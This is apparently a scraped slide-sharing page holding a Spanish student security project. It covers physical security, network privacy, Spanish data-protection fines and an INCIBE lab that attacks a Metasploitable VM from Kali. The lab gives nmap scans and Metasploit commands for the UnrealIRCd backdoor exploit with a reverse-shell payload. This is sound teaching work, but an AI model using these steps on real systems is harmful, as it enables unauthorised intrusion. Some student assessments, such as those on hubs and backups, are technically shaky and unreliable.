c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptxc3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
c3.hu3.p1.p2.El ser humano y el sentido de su existencia.pptx
 
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARONARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
 
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
Estas son las escuelas y colegios que tendrán modalidad no presencial este lu...
 
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptxPresentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
Presentación de Estrategias de Enseñanza-Aprendizaje Virtual.pptx
 
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDUFICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
FICHA DE MONITOREO Y ACOMPAÑAMIENTO 2024 MINEDU
 
Sesión La luz brilla en la oscuridad.pdf
Sesión La luz brilla en la oscuridad.pdfSesión La luz brilla en la oscuridad.pdf
Sesión La luz brilla en la oscuridad.pdf
 
Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.Clasificaciones, modalidades y tendencias de investigación educativa.
Clasificaciones, modalidades y tendencias de investigación educativa.
 

Proyecto1 SEIN

  • 1. Proyecto en el que se incluyen tanto la descripción de medidas aplicables de seguridad en diversos casos como un ataque desde una máquina kali-linux a una máquina con metasplotaible para atacarla. Proyecto 1. Conceptos Seguridad informática Patricia Durán de Jesús
  • 2. ÍNDICE 1. MEDIDAS DE SEGURIDAD PASIVA...................................................................1 2. ASEGURAR LA PRIVACIDAD .........................................................................3 3. DEMOSTRACIÓN VULNERABILIDADES .............................................................6
  • 3. Seguridad informática 2017-2018 Patricia Durán de Jesús 1 1. MEDIDAS DE SEGURIDAD PASIVA Aplicar medidas de seguridad pasiva en sistemas informáticos describiendo características de entornos y relacionándolas con sus necesidades.  Trabajas en una auditoría de seguridad informática. Llega un nuevo cliente que desea conocer la situación de su empresa en cuanto a seguridad informática y si es aceptable o podría mejorar. Durante la entrevista tomas las siguientes notas:  El edificio tiene un servicio de vigilancia a través de una empresa externa. Por reducción del presupuesto, ahora solo hay un vigilante que también atiende el edificio del otro lado de la calle. → Se necesita mayor seguridad. No se puede tener a un único vigilante y que encima debe estar vigilando dos edificios ya que la vigilancia no es igual de fiable y constante.  El CPD tiene otro vigilante, de otra compañía, que también atiende el teléfono de la centralita a partir de las 3, cuando termina el turno del recepcionista. → El centro de protección de datos debe estar bien protegido, no puede haber un vigilante que tenga 2 cargos más porque no presta la atención suficiente y al distraerse pueden haber posibles robos o alteraciones.  Para entrar al CPD, cada informático tiene una tarjeta particular, si bien hay una en el cajón de la mesa del vigilante para el personal de limpieza o por si ocurre una emergencia. → Cada tarjeta debe ser intransferible y no pueden tener acceso a cada tarjeta particular distintas personas al propietario de la misma. Además de que cada informático no debe tener acceso al CPD, solo los encargados del mismo.  Una vez a la semana se hace la copia de seguridad. Como solo disponen de un dispositivo de cinta, los cuatro servidores se reparten cada semana del mes. Dado que solo hay un vigilante para el CPD, las cintas se dejan dentro de la sala, cada una encima de su servidor (cada servidor tiene una cinta en exclusiva). → Las copias deben ser instantáneas ya que en el momento en que se hacen cambios, añaden o quitan cosas se pueden perder datos. Las cintas no pueden estar a plena vista y mucho menos encima de cada servidor, si alguien entrase a robar los datos, l tendría muy fácil ya que solo hay un vigilante. Se tiene que poner mayor vigilancia, realizar copias de seguridad
  • 4. Seguridad informática 2017-2018 Patricia Durán de Jesús 2 instantáneas, mejorar el método de las copias y guardarlas en un lugar seguro que no esté a la vista de cualquiera.  El edificio pertenece al patrimonio histórico y no admite reformas en la fachada. Por tanto, no ha sido posible instalar equipos de aire acondicionado en el CPD. Para combatir el calor que desprenden los ordenadores, las ventanas están siempre abiertas. Cada servidor tiene un disco duro de alta gama, que no ha fallado nunca. → Se necesita refrigeración, las ventanas no pueden estar abiertas, entran suciedad y polvo constantemente y eso genera más calor en los equipos, se debe instalar refrigeración y en caso de que no puedan por no admitir reformas, se deberá cambiar el CPD a otro edificio que si permita realizar los cambios necesarios.  Los servidores tienen doble fuente de alimentación, por si se estropea alguna. → Está bien e incluso deberían haber Sistemas de Alimentación Ininterrumpida.  El presidente y el contable tienen cada uno un portátil de la empresa. El disco duro de estas máquinas no está cifrado porque no se arriesgan al desastre que supondría olvidar la contraseña. → Cifrar el disco duro y cada equipo protegerlo con una contraseña bien elaborada, sin datos personales o relacionados con el trabajo o empresa.  Los ordenadores tienen dos usuarios: uno para las tareas normales y otro cuando necesitan realizar alguna instalación o modificar un parámetro del sistema operativo. Los empleados saben cuándo deben usar cada uno. → Los empleados no deben tener acceso a instalaciones o modificaciones de parámetros del sistema operativo. Eso puede ocasionar problemas, ya que pueden configurar o borrar algo que no deben o incluso instalar malware sin darse cuenta y crea vulnerabilidades. Los empleados deben tener un usuario en el que tengan permisos limitados.  Termináis por hoy la entrevista porque ha sido una reunión muy larga. Todavía no has redactado el informe final, pero ¿encuentras algo que mejorar? ¿Qué alternativa le puedes proponer? Cambiar la seguridad y forma de actuar de la empresa con lo ya indicado en los apartados anteriores. Modificaría los niveles de seguridad, copias de seguridad realizadas, etc.
  • 5. Seguridad informática 2017-2018 Patricia Durán de Jesús 3 2. ASEGURAR LA PRIVACIDAD Asegurar la privacidad de la información transmitida en redes informáticas describiendo vulnerabilidades e instalando software específico.  Al día siguiente continúa la entrevista: Tus nuevas notas son:  Hay una red wifi en la oficina que permite entrar en la red de ordenadores y salir a Internet. No tiene contraseña para que los clientes puedan utilizarla con total comodidad. → Deben de poner una contraseña, ya que no tenerla no hace que sea más cómodo si no que permite a personas externas a la empresa que puedan acceder sin ningún tipo de complejidad. Al menos teniendo contraseñas y diferenciando bien la red pública de la red privada de la empresa evitas posibles intrusos.  La mayoría de los ordenadores utilizan Windows XP, pero algunos empleados necesitan Windows 7, 8 o incluso 10 para correr ciertas aplicaciones. Como la empresa no puede afrontar la compra de nuevas licencias, están utilizando software pirata. → La empresa debe asumir el precio de unas licencias de Windows 10, por ejemplo, ya que es el más actual y tiene soporte técnico mientras que Windows XP ya no. En caso de no poder asumir el precio, podrían pasar a un software libre.  En cuanto al antivirus, cada empleado pone el que más le gusta y se los pasan entre ellos mediante dispositivos USB. → Se debería tener un mismo antivirus para todos los equipos y estar terminantemente prohibido el uso de USB ajenos o propios de los trabajadores, ya que existe el riesgo de que ese USB esté infectado con malware e infectase a toda la empresa.  Los ordenadores que hacen de servidores tienen activadas las actualizaciones automáticas de todas las aplicaciones y el sistema operativo, pero en los ordenadores de empleados no se hace porque han visto que se satura la conexión a Internet. → Se deben actualizar siempre que sea necesario ya que en las actualizaciones existen modificaciones del software que quizá implementen mayor seguridad o arreglen fallos que puedan ocasionar un agujero de seguridad en un futuro lejano, o incluso cercano.  La mayoría de los equipos de red son switch y routers, pero algunos despachos todavía tienen hubs porque son fiables y el ancho de banda es suficiente. → Los hubs generan mucho tráfico y consumen más
  • 6. Seguridad informática 2017-2018 Patricia Durán de Jesús 4 ancho de banda, aunque son más rápidos, no son tan fiables como pueden ser un switch o un router-  Para entrar a la red desde Internet utilizan Hamachi, un servicio gratuito y muy sencillo de instalar. → Hamachi tiene como desventajas los problemas con los enrutadores, ya que se generan conflictos. Otra opción para tener una red privada sería OpenVPN.  El servidor web está instalado sobre una máquina con sistema operativo Linux Ubuntu Server 9.04. → Cambiar la versión de Linux Ubuntu Server a una más actualizada para mantenernos al día en actualizaciones tanto a nivel de seguridad como software en general. Últimas versiones: Ubuntu Server 16.04.3 LTS y Ubuntu Server 17.04 La empresa recoge datos de las personas que solicitan información acerca de las promociones que tiene actualmente. El objetivo es poder enviarles información sobre futuras promociones. Los datos que se solicitan son: nombre, dirección y correo electrónico. Una secretaria introduce los datos en una hoja Excel en su ordenador.  ¿Crees que tendría que haber solicitado a la Agencia de Protección de Datos la creación del fichero que contiene los datos? La Ley Orgánica de Protección de datos de carácter personal de las personas físicas. Pueden estar en cualquier tipo de soporte, digitalizado o no. La Ley establece cómo se pueden tomar los datos, que tipo de almacenamiento protegido necesitan y qué derecho y obligaciones tiene el ciudadano. Se debe solicitar o informar a la Agencia de Protección de Datos.  ¿Qué nivel de seguridad requerirá el fichero? Requiere el nivel básico  ¿Qué medidas de seguridad requiere este nivel? - Identificar y autenticar a los usuarios que pueden trabajar con estos datos - Llevar un registro de incidencias acontecidas en el fichero - Realizar copias de seguridad como mínimo semanalmente  Haz un listado de las infracciones que podrían cometerse con respecto al fichero y destaca cuáles de ellas supondrían una sanción mayor. Leves (601,01 € y 60.101,21 €): - No solicitar la inscripción del fichero en la AEDP
  • 7. Seguridad informática 2017-2018 Patricia Durán de Jesús 5 - Recopilar datos personales sin informar previamente - No atender a las solicitudes de rectificación o cancelación - No atender a las consultas por parte de la AGPD Graves (60.101,21 € y 300.506,25 €) - No inscribir los ficheros en la AGPD. - Utilizar los ficheros con distinta finalidad con la se crearon. - No tener el consentimiento del interesado para recabar sus datos personales - No permitir el acceso a los ficheros. - Mantener datos inexactos o no efectuar las modificaciones solicitadas - No seguir los principios y garantías de la LOPD - Tratar datos especialmente protegidos sin la autorización del afectado - No remitir a la AGPD las notificaciones previstas en la LOPD. - Mantener los ficheros sin las debidas condiciones de seguridad. Muy graves (300.506,25 € y 601.012,1 €) - Crear ficheros para almacenar datos que revelen datos especialmente protegidos. - Recogida de datos de manera engañosa o fraudulenta. - Recabar datos especialmente protegidos sin la autorización del afectado. - No atender u obstaculizar de forma sistemática las solicitudes de cancelación o rectificación. - Vulnerar el secreto sobre datos especialmente protegidos. - La comunicación o cesión de datos cuando ésta no esté permitida. - No cesar en el uso ilegítimo a petición de la AGPD. - Tratar los datos de forma ilegítima o con menosprecio de principios y garantías que le sean de aplicación. - No atender de forma sistemática los requerimientos de la AGPD. - La transferencia temporal o definitiva de datos de carácter personal con destino a países sin nivel de protección equiparable o sin autorización
  • 8. Seguridad informática 2017-2018 Patricia Durán de Jesús 6 3. DEMOSTRACIÓN VULNERABILIDADES Completar el informe con una demo en la que le harás ver al cliente cómo se pueden aprovechar las vulnerabilidades de sus sistemas. Para ello vas a realizar la práctica de INCIBE “Explotando un sistema” perteneciente al capítulo “Fundamentos del análisis de sistemas”, siguiendo el correspondiente vídeo-tutorial de YouTube. Vas a necesitar dos máquinas virtuales, una con kali-linux (máquina atacante) y la otra con metasploitable 2 (máquina vulnerable). Primero comprobaremos la visibilidad entre las máquinas, tanto con kali-linux como con la máquina vulnerable, la metasploitable. Podemos comprobar que la IP de la máquina vulnerable es 192.168.1.165 y la máquina atacante 192.168.1.166
  • 9. Seguridad informática 2017-2018 Patricia Durán de Jesús 7 Para comprobar la visibilidad entre ambas, haremos ping desde la máquina atacante a la máquina vulnerable: - Ping 192.168.1.165 Utilizaremos Nmap para escanear la IP de la red (192.168.1.0) para encontrar los equipos encendidos en la red.
  • 10. Seguridad informática 2017-2018 Patricia Durán de Jesús 8 Procederemos a escanear los puertos de nuestra máquina con nmap –sT –O 192.168.1.166 (IP de la máquina atacada) Lo siguiente que haremos será: Nmap –sT –sV (IP de la máquina vulnerable, atacada)
  • 11. Seguridad informática 2017-2018 Patricia Durán de Jesús 9 El siguiente paso a realizar será “telnet (IP del objetivo) (Puerto de telnet). Una vez hecho, podremos poner herramientas como FTP o SSH. El procedimiento es abrir la consola e introducir los comandos: - ftp <dirección IP> - telnet <dirección IP> - ssh <dirección IP>
  • 12. Seguridad informática 2017-2018 Patricia Durán de Jesús 10
  • 13. Seguridad informática 2017-2018 Patricia Durán de Jesús 11 Abriremos una consola del sistema e introduciremos estos comandos: Msfconsole Use exploit /unix/irc/unreal_ircd_3281_backdoor Set RHOST <IP Metasploitable> Set payload <payload> (cmd/unix/reverse) Set LHOST <IP Kali linux> Exploit